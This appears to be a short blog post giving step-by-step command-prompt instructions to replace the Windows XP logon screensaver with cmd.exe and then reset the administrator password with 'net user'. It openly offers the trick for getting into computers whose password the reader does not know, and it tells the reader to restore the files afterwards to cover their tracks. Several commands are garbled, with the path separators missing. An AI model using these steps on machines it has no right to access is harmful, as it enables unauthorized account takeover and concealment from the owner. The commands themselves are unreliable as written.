Most of the times of much more Windows users are facing this problem of losing their Admin account password.So that they can not login inn to their machine and going through a worst condition. This technique, trick or you can say hack which will allow you to login in to windows XP admin account.
Here is the solution or you can say it as hack, this article will show you How to Hack Windows XP Admin Password at times when you forget it or when you want to gain access to a computer for which you do not know the password.
Windows XP Admin Password Hack
Password Hack With Limited Account Dos Prompt
If you log into a limited account on your target machine and open up a dos prompt.Then enter this set of commands Exactly
- cd This command drops to root
- cdwindowssystem32 This command directs to the system32 dir
- mkdir temphack This command creates the folder temphack
- copy logon.scr temphacklogon.scr This command backup logon.scr
- copy cmd.exe temphackcmd.exe This command backup cmd.exe
- del logon.scr This command deletes original logon.scr
- rename cmd.exe logon.scr This command renames cmd.exe to logon.scr
- exit This command will quit dos
Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt without logging into XP.
Once this happens if you enter this command minus the quotes
“net user password”
If the Administrator Account is called Frank and you want the password blah enter this
“net user Frank blah”
and this changes the password on franks machine to blah and your are in.
Note: Don’t forget to copy the contents of temphack back into the system32 dir to cover tracks.
There are more different methods or password hack to Log on to Windows-XP you can check it out HERE